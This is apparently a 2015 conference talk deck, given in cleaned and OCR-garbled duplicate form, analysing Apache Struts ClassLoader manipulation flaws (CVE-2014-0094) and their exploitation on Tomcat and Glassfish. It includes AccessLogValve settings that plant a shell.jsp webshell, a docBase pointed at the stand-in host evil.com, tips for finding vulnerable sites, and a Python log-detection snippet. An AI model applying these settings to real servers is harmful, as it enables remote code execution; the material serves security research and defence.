Deep inside the Java framework Apache Struts

Julián Vilas

Whoami
•  Julián Vilas (Redsadic)
   – @julianvilas
•  Security Analyst & Researcher

¿Apache Struts?
Java framework
– for Java webapps
– Two major versions
  • Struts 1.x (EoL since 2013)
  • Struts 2.x

Why Struts?
•  (Mar 2014) CVE-2014-0094 goes public
•  What the hell was it?
   – Struts 2 vulnerability
   – Unauthenticated
   – All versions affected
   – Could lead to RCE

CVE-2014-0094
“ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulation”
•  Credits:
   – Peter Magnusson
   – Przemysław Celej
•  After reading it…
   – Let’s go learning some basics
OGNL
Object Graph Navigation Language
•  Expression Language for getting and setting properties of Java objects
   – Objects that are stored in the Context

OGNL
(Diagram: the OGNL Context holds the objects foo, bar, baz and qux; the root is a stack of objects (foo, bar, qux, …) searched from the top, so an unprefixed property resolves against qux. In Struts 2 the OGNL Context is the ActionContext and the root is the ValueStack.)
  #foo.dummy             // foo.getDummy()
  #bar.dummy             // bar.getDummy()
  dummy                  // qux.getDummy()
  dummy = “RootedCON”    // qux.setDummy(“RootedCON”)
Struts 2 request processing
(Diagram, steps 1 to 7: the User requests http://struts.example.com/example/hello.action; inside the Struts2 app the request passes through the Filter Dispatcher, the Interceptors (among them ParametersInterceptor), the Action and the Result, and HTML is returned to the User.)
ParametersInterceptor
“This interceptor gets all parameters from ActionContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)”
“Because parameter names are effectively OGNL statements, it is important that security be taken into account”
http://struts.apache.org/release/2.0.x/struts2-core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html

ParametersInterceptor example
(Diagram over two slides: HelloWorldAction is pushed onto the ValueStack held by the ActionContext; for each request parameter the interceptor looks the property up on the stack, finds its setter and sets the value: PUSH, LOOKUP, SETTER, SET.)
Available methods
Methods that can be reached
– As seen, OGNL allows us to reference getters and setters
(Diagram, built up over three slides: the class hierarchy as OGNL sees it.)
  HelloWorldAction: execute(), getUsername(), setUsername()
    EXTENDS ActionSupport: …, getErrors(), getTexts(), getFieldErrors(), getActionErrors(), getActionMessages(), getErrorMessages(), …
      EXTENDS Object: …, getClass(), …
Navigating objects
•  Parameters are evaluated iteratively as an AST chain, composed of
   – A chain of getters (without parameters)
   – Ending with a setter (1 String, boolean or int parameter)
	
  
Looking for setters
•  Through object navigation, several setter methods that are not part of the Action can be reached
   – What methods?
•  Post published by neobyte
   http://sec.baidu.com/index.php?research/detail/id/18
   1.  PoC for getting reachable setters
   2.  A method for getting RCE on Tomcat 8

DEMO
Struts Tester on Tomcat 6 / 7 & Tomcat 8
customized & commented version ready to use
https://github.com/julianvilas/rooted2k15
Exploitability
Tested against:
•  Tomcat 6 / 7 → RCE via “docBase” (win only)
•  Tomcat 8 → RCE via “AccessLogValve”
•  Glassfish 4 → RCE via “docBase” (win only)
•  Websphere 8.5 (developer) → RCE not found
•  Weblogic 10 & 12 → RCE not found
•  JBOSS 7.1 & 7.4 → RCE not found
What about Struts 1
•  According to CVE-2014-0114, Struts 1 is also vulnerable
•  Unpatched! (Struts 1 is past EoL, but is still in use)
•  Different reason: Struts 1 has neither OGNL nor a Value Stack
   – The key: bean population with BeanUtils
•  You can find some Alvaro Muñoz (@pwntester) gold, like further explanation and a filter to be applied as a workaround, at
   – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z
   – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q
AccessLogValve exploitation
(Diagram, steps 1 to 4, showing the four properties below being set.)
A log file with name shell1.jsp is created at webapps/ROOT. When requesting a nonexistent URL, the request is logged into that file (which is going to be interpreted as a JSP when accessed).
  .directory=webapps/ROOT
  .prefix=shell
  .suffix=.jsp
  .fileDateFormat=1

DEMO
AccessLogValve exploitation
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb
docBase exploitation
•  “The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file).”
•  Legit application goes down
  .docBase=//evil.com/shared

About metasploit module
•  Tomcat 6/7 & GlassFish (docBase)
   – Only Win
   – Not landed yet in trunk but works fine
   – Matthew Hall (0x41414141) pull requests:
     https://github.com/rapid7/metasploit-framework/pull/3074
     https://github.com/rapid7/metasploit-framework/pull/3075
     https://github.com/rapid7/metasploit-framework/pull/3323
   – Same module as before, landed yesterday night

DEMO
docBase exploitation
I know Kung-fu
•  Now what?

Searching Struts sites
•  Dumb detection of Struts 2 sites
   – Default extension for Struts 2: “.action”
•  Also, when default configured, it accepts both “.action” and no extension
(Three further slides under this title carry search screenshots only.)

Searching Struts sites
•  Dumb detection of Struts 1 sites
   – Default extension for Struts 1: “.do”

Searching Struts sites
https://web.archive.org/web/20060519001958/http://simonpeter.com/technology/java/struts/sites.html
Vulnerability checking
•  To check if a Struts 2 site is vulnerable, modify the “cacheMaxSize” property
   – Integer.MAX_VALUE == 2147483647 (in x86)
(Table of responses, shown as screenshots: rows for Tomcat 6/7 & Glassfish and for Tomcat 8; columns for the values 2147483647, 2147483648 and AAAAAAAAA.)

Vulnerability checking
•  In Struts 1, if the conversion from String to Integer fails, a default value of 0 is set
•  But when trying to set a method that receives an Object with a String, an exception is raised
(Screenshot: ROOTEDCON)

OK I see, but…
	
  
	
  
	
  
Previous security bulletins
(Table, one row per bulletin; the bulletin identifiers were in a column not captured here.)
•  RCE, when form validation fails field values are interpreted as OGNL
•  RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
•  RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL ! S2-003 fix was incomplete
•  RCE, user’s input is evaluated as OGNL when there’s a conversion error
•  Several RCE: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
•  RCE, incomplete fix for S2-003 and S2-005 on ParametersInterceptor

Previous security bulletins
•  RCE, incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
•  RCE, s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL.
•  RCE, same as S2-013, incomplete fix.
•  RCE, actions using wildcards and Double OGNL evaluation allow OGNL injection
•  RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
•  RCE, what we saw in this presentation ☺ (ParametersInterceptor)
•  RCE, Incomplete fix for S2-020
•  Incomplete fix for S2-020 and S2-021

Previous security bulletins
(Slide with a figure only.)
Conclusions?
•  Seven years between S2-001 and S2-020
•  Same kind of vulnerabilities: injecting OGNL from user-supplied data
•  Several bypasses for fixes
•  Almost all RCE
•  Take your own…

Bonus track - Confluence
•  Is based on a WebWork fork (predating Struts 2)
•  If you look at their bulletins
   – Versions up to and including 5.5.1 vulnerable to ClassLoader manipulation
     https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21
   – Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation
     https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21
•  Don’t they look familiar? ☺

Bonus track - Confluence
(Slide with a figure only.)

Questions?
•  You can also ask:
   – Poke me around
   – by Twitter: @julianvilas

Questions?
•  And what do you think about OGNL?

Thanks for attending!!! ☺

RootedCON 2015 - Deep inside the Java framework Apache Struts

  • 1. Deep  inside  the  Java   framework     Apache  Struts       Julián  Vilas  
  • 2. Whoami   •  Julián  Vilas  (Redsadic)   – @julianvilas   •  Security  Analyst  &  Researcher    
  • 3. ¿Apache  Struts?   Java  framework   – for  Java  webapps   – Two  major  versions   • Struts  1.x  (EoL  since  2013)   • Struts  2.x  
  • 4. Why  Struts?   •  (Mar  2014)  CVE-­‐2014-­‐0094  goes  public   •  What  the  hell  was  it?   – Struts  2  vulnerability   – UnauthenVcated   – All  versions  affected   – Could  lead  to  RCE  
  • 5. CVE-­‐2014-­‐0094   “ParametersInterceptor  allows  access  to  'class'   parameter  which  is  directly  mapped  to  getClass()   method  and  allows  ClassLoader  manipulaVon”     •  Credits:   –  Peter  Magnusson   –  Przemysław  Celej   •  A^er  reading  it…   –  Let’s  go  learning  some  basics  
  • 6. OGNL   Object  Graph  NavigaVon  Language     •  Expression  Language  for  gedng  and  sedng   properVes  of  Java  objects   – Objects  that  are  stored  in  the  Context    
  • 7. top   OGNL   #foo.dummy     //  foo.getDummy()     #bar.dummy   //  bar.getDummy()     dummy   //  qux.getDummy()     dummy  =  “RootedCON”   //  qux.setDummy(“RootedCON”)   foo   bar   baz   qux   Context   root   foo   bar   qux   ….   Struts2  OGNL  Context   (AcDonContext)   ValueStack  
  • 8. Struts  2  request  processing       1 7 Filter     Dispatcher   Interceptors   AcVon   Result   /example/hello.acDon   HTML   1 7 User   2 3 4 56 hMp://struts.example.com/example/hello.acDon   HTML   ParametersInterceptor   Struts2  app  
  • 9. ParametersInterceptor   “This  interceptor  gets  all  parameters  from   AcVonContext.getParameters()  and  sets  them  on   the  value  stack  by  calling   ValueStack.setValue(String,  Object)”   “Because  parameter  names  are  effecDvely  OGNL   statements,  it  is  important  that  security  be  taken   into  account”   hpp://struts.apache.org/release/2.0.x/struts2-­‐core/apidocs/com/opensymphony/xwork2/interceptor/ ParametersInterceptor.html    
  • 10. ParametersInterceptor  example   …   HelloWorldAcVon   …   AcDonContext   ValueStack   PUSH   LOOKUP   SETTER   SET  
  • 12. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   ?   AcDonSupport   EXTENDS  
  • 14. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS  
  • 16. Available  methods   Methods  that  can  be  reached   – As  seen,  OGNL  allows  us  to  reference  gepers  and   sepers     execute()   getUsername()   setUsername()   HelloWorldAcDon   …   getErrors()   getTexts()   getFieldErrors()   getAcDonErrors()   getAcDonMessages()   getErrorMessages()   …   AcDonSupport   EXTENDS   …   getClass()   …   Object   EXTENDS  
  • 17. NavigaVng  objects             •  Parameters  are  evaluated  iteraVvely  as  an  AST   chain,  composed  by   – A  chain  of  gepers  (without  parameters)   – Ending  with  a  seper  (1  String,  boolean  or  int   parameter)    
  • 18. Looking  for  sepers   •  Through  object  navigaVon  reach  several  seper   methods  not  part  of  the  AcVon  can  be  reached   –  What  methods?   •  Post  published  by  neobyte       hpp://sec.baidu.com/index.php?research/detail/id/18     1.  PoC  for  gedng  reachable  sepers   2.  A  method  for  gedng  RCE  on  Tomcat  8    
  • 19. DEMO   Struts  Tester  on   Tomcat  6  /  7  &  Tomcat  8     customized  &  commented  version  ready  to  use   hpps://github.com/julianvilas/rooted2k15  
• 20. Exploitability – Tested against: • Tomcat 6 / 7 → RCE via “docBase” (win only) • Tomcat 8 → RCE via “AccessLogValve” • Glassfish 4 → RCE via “docBase” (win only) • Websphere 8.5 (developer) → RCE not found • Weblogic 10 & 12 → RCE not found • JBOSS 7.1 & 7.4 → RCE not found
• 21. What about Struts 1 • According to CVE-2014-0114, Struts 1 is also vulnerable • Unpatched! (Struts 1 is past EoL, but is still in use) • Different reason: Struts 1 has neither OGNL nor a Value Stack – The key: bean population with BeanUtils • You can find some Alvaro Muñoz (@pwntester) gold, including further explanation and a filter to be applied as a workaround, at – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q
• 22. AccessLogValve exploitation – A log file named shell1.jsp is created at webapps/ROOT. When a non-existent URL is requested, the request is written into that log file (which will be interpreted as a JSP when it is accessed). [settings shown, steps 1–4:] .directory=webapps/ROOT .prefix=shell .suffix=.jsp .fileDateFormat=1
• 23. DEMO – AccessLogValve exploitation – https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb
• 24. docBase exploitation • “The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file).” • Legit application goes down: .docBase=//evil.com/shared
• 25. About the metasploit module • Tomcat 6/7 & GlassFish (docBase) – Only Win – Not landed in trunk yet, but works fine – Matthew Hall (0x41414141) pull requests: https://github.com/rapid7/metasploit-framework/pull/3074 https://github.com/rapid7/metasploit-framework/pull/3075 https://github.com/rapid7/metasploit-framework/pull/3323 – Same module as before, landed yesterday night
• 27. I know Kung-fu • Now what?
• 28. Searching Struts sites • Dumb detection of Struts 2 sites – Default extension for Struts 2: “.action” • Also, with the default configuration, it accepts both “.action” and no extension
• 31. Searching Struts sites • Dumb detection of Struts 1 sites – Default extension for Struts 1: “.do”
• 32. Searching Struts sites – https://web.archive.org/web/20060519001958/http://simonpeter.com/technology/java/struts/sites.html
• 33. Vulnerability checking • To check whether a Struts 2 site is vulnerable, modify the “cacheMaxSize” property – Integer.MAX_VALUE == 2147483647 (in x86) • Tomcat 6/7 & Glassfish • Tomcat 8 [screenshots of the values tried: 2147483647, 2147483648, AAAAAAAAA]
• 34. Vulnerability checking • In Struts 1, if the conversion from String to Integer fails, a default value of 0 is set • But when trying to call a setter that receives an Object with a String, an exception is raised [screenshot: ROOTEDCON]
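An added defensive example (not code from the talk or from Struts) that ties together the chained-getter parameter names of slide 17, the filter workaround mentioned on slide 21, and the cacheMaxSize probes of slides 33 and 34: a parameter-name check that refuses any name stepping through the "class" property, used once as a request filter and once to scan constructed access-log lines for such probes. The regex is modeled on the excludeParams idea of the Struts 2 fix but is written here, and the log lines and the property path in them are constructed samples.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Flags a parameter name that steps through an object's "class" property
# (class.classLoader..., user.Class..., user['class']...), the chain of
# getters that reaches getClassLoader(). Modeled on the excludeParams idea
# of the Struts 2 fix; written for this example, not the framework's regex.
CLASS_TRAVERSAL = re.compile(r"(^|\.|\[['\"])[cC]lass(\.|['\"]\]|\[)")

# Tomcat common log format: host ident user [date] "METHOD target proto" status bytes
LOG_LINE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def is_class_traversal(param_name):
    """True if evaluating this name as OGNL would pass through getClass()."""
    return CLASS_TRAVERSAL.search(param_name) is not None


def filter_params(params):
    """Return (kept, dropped): what a request filter would forward to the
    ParametersInterceptor and the parameter names it refused."""
    kept, dropped = {}, []
    for name, value in params.items():
        if is_class_traversal(name):
            dropped.append(name)
        else:
            kept[name] = value
    return kept, dropped


def scan_access_log(lines):
    """Return (target, offending names) for each logged request whose query
    string carries a class-traversing parameter, e.g. a cacheMaxSize probe."""
    hits = []
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        names = [n for n, _ in parse_qsl(query, keep_blank_values=True)
                 if is_class_traversal(n)]
        if names:
            hits.append((match.group("target"), names))
    return hits


# Constructed sample access-log lines (not captured from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Mar/2015:10:00:01 +0100] "GET /example/hello.action?username=rooted HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Mar/2015:10:00:02 +0100] "GET /example/hello.action?class.classLoader.resources.dirContext.cacheMaxSize=2147483647 HTTP/1.1" 200 512',
    '10.0.0.7 - - [10/Mar/2015:10:00:03 +0100] "GET /example/hello.action?user[%27class%27].classLoader.x=1 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for target, names in scan_access_log(SAMPLE_LOG):
        print("suspicious request:", target, names)
```

The second and third sample lines are flagged; the bracket form shows why the check has to look at the decoded name and not only at a leading "class." prefix.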
• 35. OK I see, but…
• 36. Previous security bulletins [table, one entry per bulletin:]
– RCE, when form validation fails field values are interpreted as OGNL
– RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
– RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL – S2-003 fix was incomplete
– RCE, user’s input is evaluated as OGNL when there’s a conversion error
– Several RCE: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
– RCE, incomplete fix for S2-003 and S2-005 on ParametersInterceptor
• 37. Previous security bulletins [table continued:]
– RCE, incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
– RCE, s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL
– RCE, same as S2-013, incomplete fix
– RCE, actions using wildcards and double OGNL evaluation allow OGNL injection
– RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
– RCE, what we saw in this presentation ☺ (ParametersInterceptor)
– RCE, incomplete fix for S2-020
– Incomplete fix for S2-020 and S2-021
• 39. Conclusions? • Seven years between S2-001 and S2-020 • Same kind of vulnerabilities: injecting OGNL from user-supplied data • Several bypasses for fixes • Almost all RCE • Draw your own…
• 40. Bonus track - Confluence • It is based on a WebWork fork (WebWork predates Struts 2) • If you look at their bulletins – Versions up to and including 5.5.1 are vulnerable to ClassLoader manipulation: https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21 – Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation: https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21 • Don’t they look familiar? ☺
• 41. Bonus track - Confluence
• 42. Questions? • You can also ask: – Poke me around – by twitter: @julianvilas
• 43. Questions? • And what do you think about OGNL? Thanks for attending!!! ☺